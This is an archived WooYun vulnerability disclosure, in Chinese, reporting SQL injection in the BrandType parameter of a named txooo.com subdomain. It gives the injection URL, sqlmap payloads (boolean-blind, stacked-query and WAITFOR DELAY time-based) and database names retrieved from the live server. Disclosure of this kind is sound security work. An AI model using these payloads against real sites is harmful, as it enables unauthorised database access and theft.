乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-03-29: 积极联系厂商并且等待厂商认领中,细节不对外公开 2016-05-13: 厂商已经主动忽略漏洞,细节向公众公开
天下商机网分站存在SQL注入
注入点
http://so.txooo.com/PP_1.htm?BrandType=1&InvestMoney=1
注入证明
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: BrandType Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: BrandType=1 AND 7810=7810 Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: BrandType=1; WAITFOR DELAY '0:0:5';-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: BrandType=1 WAITFOR DELAY '0:0:5'-----[19:03:05] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windowsweb application technology: ASP.NET, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2005[19:03:05] [INFO] fetching database names[19:03:05] [INFO] fetching number of databases[19:03:05] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval[19:03:05] [INFO] retrieved:[19:03:06] [WARNING] reflective value(s) found and filtering out[19:03:06] [WARNING] frames detected containing attacked parameter values. Please be sure to test those separately in case that attack on this page fails51[19:03:22] [INFO] retrieved: EnSAAS_001723_CD_2[19:07:30] [INFO] retrieved: EnSAAS
test
未能联系到厂商或者厂商积极拒绝
漏洞Rank:8 (WooYun评价)